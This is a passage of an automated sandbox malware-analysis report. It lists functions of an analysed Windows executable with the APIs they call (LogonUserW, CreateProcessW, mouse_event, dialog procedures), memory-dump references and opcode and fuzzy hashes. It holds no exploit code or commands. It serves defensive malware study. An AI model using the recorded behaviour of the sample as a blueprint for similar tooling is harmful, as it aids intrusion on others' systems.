                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00B7A163
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: d4fac1d5097ccf6fa3581be1ef32fc67adf02316bfaea93e3d09c5cc3bef95bf
                                              • Instruction ID: 2584ae5bdf913aa86908147b3c88ef632a6baba9f28e9309ba3ac1ee7ed2f7ef
                                              • Opcode Fuzzy Hash: d4fac1d5097ccf6fa3581be1ef32fc67adf02316bfaea93e3d09c5cc3bef95bf
                                              • Instruction Fuzzy Hash: 40B0923105920AABCA002B95EC19BA8BF68EB44AB2F418022F60E86060EF6254508A99
                                              Function 00B5E6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                              Download Yara Rule
                                              Strings
                                              • Variable must be of type 'Object'., xrefs: 00B93E62
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Variable must be of type 'Object'.
                                              • API String ID: 0-109567571
                                              • Opcode ID: e641d32cafeae5e66249e674018e452fbdab950b99b10176c13b24cfaf0709c3
                                              • Instruction ID: c73962270b3dc49f4fe5b9f3d542a5e30ff62e523e508ce6c5a4d4e2ab4b60e4
                                              • Opcode Fuzzy Hash: e641d32cafeae5e66249e674018e452fbdab950b99b10176c13b24cfaf0709c3
                                              • Instruction Fuzzy Hash: 54A24975A00205CBCB28CF54C480BAAB7F2FB59311F6480E9ED25AB351D775EE4ACB91
                                              Function 00B7F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 79542cdf30509934ddf3b92c0b137585df5b45b2b333af8b6d80470ca69fc938
                                              • Instruction ID: 12f1c9f3d00c3ecbcc202e0f586698c30ad6fefdce1a41a01726d3ba3cc1bdd4
                                              • Opcode Fuzzy Hash: 79542cdf30509934ddf3b92c0b137585df5b45b2b333af8b6d80470ca69fc938
                                              • Instruction Fuzzy Hash: 2E320522D69F424DD7239634D872335A289AFB73C5F15D737F82ABA9A5EF28C4834104
                                              Function 00B8242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b709bfff5e3ec7d0f6bbc5a3db7d4964b56b49e30ee1a707274cca57882bb1f2
                                              • Instruction ID: e325feccdce3a167206744b8a8a2a9410567002dec514bf02e9b0f681019771a
                                              • Opcode Fuzzy Hash: b709bfff5e3ec7d0f6bbc5a3db7d4964b56b49e30ee1a707274cca57882bb1f2
                                              • Instruction Fuzzy Hash: 26B10330D2AF804DD323A6398871336B69CAFBB2C5F52D71BFC1675D62EB2195834241
                                              Function 00BB8889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                              Download Yara Rule
                                              APIs
                                              • __time64.LIBCMT ref: 00BB889B
                                                • Part of subcall function 00B7520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00BB8F6E,00000000,?,?,?,?,00BB911F,00000000,?), ref: 00B75213
                                                • Part of subcall function 00B7520A: __aulldiv.LIBCMT ref: 00B75233
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Time$FileSystem__aulldiv__time64
                                              • String ID:
                                              • API String ID: 2893107130-0
                                              • Opcode ID: 9ea3f9559c26d80c468621feb7cc531d27ae8b8ac685bab1d660711360dfca5b
                                              • Instruction ID: 985e2fc62efd489d4d664fbb590a9031701ab4e65bbceebf7b2906d2664284ca
                                              • Opcode Fuzzy Hash: 9ea3f9559c26d80c468621feb7cc531d27ae8b8ac685bab1d660711360dfca5b
                                              • Instruction Fuzzy Hash: BD21B4726355108BC729CF25D841BA6B3E5EFA5311B688E6CD0F5CB2D0CA74B905CB54
                                              Function 00BDD78C Relevance: 1.6, APIs: 1, Instructions: 66nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                              • NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 00BDD838
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: DialogLongNtdllProc_Window
                                              • String ID:
                                              • API String ID: 2065330234-0
                                              • Opcode ID: b8c233b40109bc668e7669e4ad1633df9ea9f1fb5458edcff84788b18cae3f37
                                              • Instruction ID: 7234034dbea3f22be669dee21acd89d6cdb625a7bb37931bed812d76d154c923
                                              • Opcode Fuzzy Hash: b8c233b40109bc668e7669e4ad1633df9ea9f1fb5458edcff84788b18cae3f37
                                              • Instruction Fuzzy Hash: 0B11EB34204215EBEB265A2CCC46FBA7794D742720F204396F5955B7D2EA619D00A395
                                              Function 00BDD3B8 Relevance: 1.5, APIs: 1, Instructions: 47nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B525DB: GetWindowLongW.USER32(?,000000EB), ref: 00B525EC
                                              • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,00B8B952,?,?,?,?,00000000,?), ref: 00BDD432
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: DialogLongNtdllProc_Window
                                              • String ID:
                                              • API String ID: 2065330234-0
                                              • Opcode ID: 94e91c09718891e8d7d4a8cd65803fe3e6bbd242dfd751e592347e657d110d4c
                                              • Instruction ID: 350272583afbe57b843031f886f952494889454b283d8f388f9e9b0dc330b97c
                                              • Opcode Fuzzy Hash: 94e91c09718891e8d7d4a8cd65803fe3e6bbd242dfd751e592347e657d110d4c
                                              • Instruction Fuzzy Hash: DC01F531600014ABDB148F28D845BF9BBD1EF46321F4441A6F9861B391E730BC119BA0
                                              Function 00B5189B Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                              • NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,00B51B04,?,?,?,?,?), ref: 00B518E2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: DialogLongNtdllProc_Window
                                              • String ID:
                                              • API String ID: 2065330234-0
                                              • Opcode ID: 1b3b7c5ea42011aeff3a696d81e44aee746ee83558007e7f07165482943ac5d4
                                              • Instruction ID: 05a1f5aee0daffdc2371d191ff161977207957f0cbf97db1c3477022a14f8258
                                              • Opcode Fuzzy Hash: 1b3b7c5ea42011aeff3a696d81e44aee746ee83558007e7f07165482943ac5d4
                                              • Instruction Fuzzy Hash: 98F09A30600215DFDB18DF08D891BAA37E2FB85311F5085A9FC524B2E0CB319850AB90
                                              Function 00BDC8BE Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00BDC8FE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: DialogNtdllProc_
                                              • String ID:
                                              • API String ID: 3239928679-0
                                              • Opcode ID: f774f499d7bb6d53b6b07c9307d5fbfc9741a95c8ff63a3e2beb8e37ea46415b
                                              • Instruction ID: a92d417d16b18100004eec1c3f60c656dd303ddf2b8d12d6d316a228c79aef55
                                              • Opcode Fuzzy Hash: f774f499d7bb6d53b6b07c9307d5fbfc9741a95c8ff63a3e2beb8e37ea46415b
                                              • Instruction Fuzzy Hash: B4F06D31241255EFDF21DF58DC45FD67B95EB1A320F048059BA11672E2CB716920E7A0
                                              Function 00BB4C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                              Download Yara Rule
                                              APIs
                                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00BB4C4A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: mouse_event
                                              • String ID:
                                              • API String ID: 2434400541-0
                                              • Opcode ID: 28d983e9e5f1ab3b0820d15acd5e755bbfebb5f1a781a0985ddf5b7cdfc75c04
                                              • Instruction ID: 92958ad8d03f6777f78cb57c3f8bed4b8b1504fbe9d3f4e4b498aac21c7dcab7
                                              • Opcode Fuzzy Hash: 28d983e9e5f1ab3b0820d15acd5e755bbfebb5f1a781a0985ddf5b7cdfc75c04
                                              • Instruction Fuzzy Hash: ECD09E9516A61A7BED6C0B209E1FFFA5AC8F340F96FD495C976028A0C3EEE09C445131
                                              Function 00BA87B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                              Download Yara Rule
                                              APIs
                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00BA8389), ref: 00BA87D1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: LogonUser
                                              • String ID:
                                              • API String ID: 1244722697-0
                                              • Opcode ID: de5b10b6caec9397273b8378b8170b0d8099b89fb3d83ba1cd7a43b7d6dc2a17
                                              • Instruction ID: 32a799f27d911051d639dc5100bf0ad7b0e816b3233fbda4b2517916f45fb872
                                              • Opcode Fuzzy Hash: de5b10b6caec9397273b8378b8170b0d8099b89fb3d83ba1cd7a43b7d6dc2a17
                                              • Instruction Fuzzy Hash: 2CD05E3226450EABEF018EA4DC01EBE3B69EB04B01F408111FE16C61A1C775D935AB60
                                              Function 00BDC909 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00B8B9BC,?,?,?,?,?,?), ref: 00BDC934
                                                • Part of subcall function 00BDB635: _memset.LIBCMT ref: 00BDB644
                                                • Part of subcall function 00BDB635: _memset.LIBCMT ref: 00BDB653
                                                • Part of subcall function 00BDB635: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00C16F20,00C16F64), ref: 00BDB682
                                                • Part of subcall function 00BDB635: CloseHandle.KERNEL32 ref: 00BDB694
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                              • String ID:
                                              • API String ID: 2364484715-0
                                              • Opcode ID: be3c843a1d3b238b4b0c7b174e5b02e7adbb990ec01f5044b73c9b36c46ff5a1
                                              • Instruction ID: 4016b49eb33dbdb107cfb33fb715e9e40e43b77d996b83ad2d9adee2c1093283
                                              • Opcode Fuzzy Hash: be3c843a1d3b238b4b0c7b174e5b02e7adbb990ec01f5044b73c9b36c46ff5a1
                                              • Instruction Fuzzy Hash: D0E04632200209EFCB02AF44EC60E99BBB1FB1C304F018092FA06073B2DB31A920EF50
                                              Function 00B5167D Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                              • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,00B51AEE,?,?,?), ref: 00B516AB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: DialogLongNtdllProc_Window
                                              • String ID:
                                              • API String ID: 2065330234-0
                                              • Opcode ID: 408551426d32053d75f7184b187a7371d5601ad952897ea41a7a22e46535d777
                                              • Instruction ID: cdebdd10ec2259ed16aaeec08f6b299c8595bd3c98ce5f05231e8fa65e7253f4
                                              • Opcode Fuzzy Hash: 408551426d32053d75f7184b187a7371d5601ad952897ea41a7a22e46535d777
                                              • Instruction Fuzzy Hash: B0E0EC35641208FFCF05AF90DC51F683B66FB9A315F508498FA450B2A1CA32A522EB50
                                              Function 00BDC88F Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtdllDialogWndProc_W.NTDLL ref: 00BDC8B4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: DialogNtdllProc_
                                              • String ID:
                                              • API String ID: 3239928679-0
                                              • Opcode ID: 57011929ce6335edf7b63f57dfe5238c0de948af24b8820af7c73bb9449e7ecc
                                              • Instruction ID: 3c9ef09ecf933672fc291907acbcb5c11a9a6ca36f28b2bfeddd00d589049a78
                                              • Opcode Fuzzy Hash: 57011929ce6335edf7b63f57dfe5238c0de948af24b8820af7c73bb9449e7ecc
                                              • Instruction Fuzzy Hash: 81E0E235240209EFDB01DF88E884EDA3BA5BB1E300F008054FA0547262CB71A820EBA1
                                              Function 00BDC860 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtdllDialogWndProc_W.NTDLL ref: 00BDC885
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: DialogNtdllProc_
                                              • String ID:
                                              • API String ID: 3239928679-0
                                              • Opcode ID: 0acc48ed992d40cab9471dd5a55c873e01e95fef125845d0d2a37324868d73f5
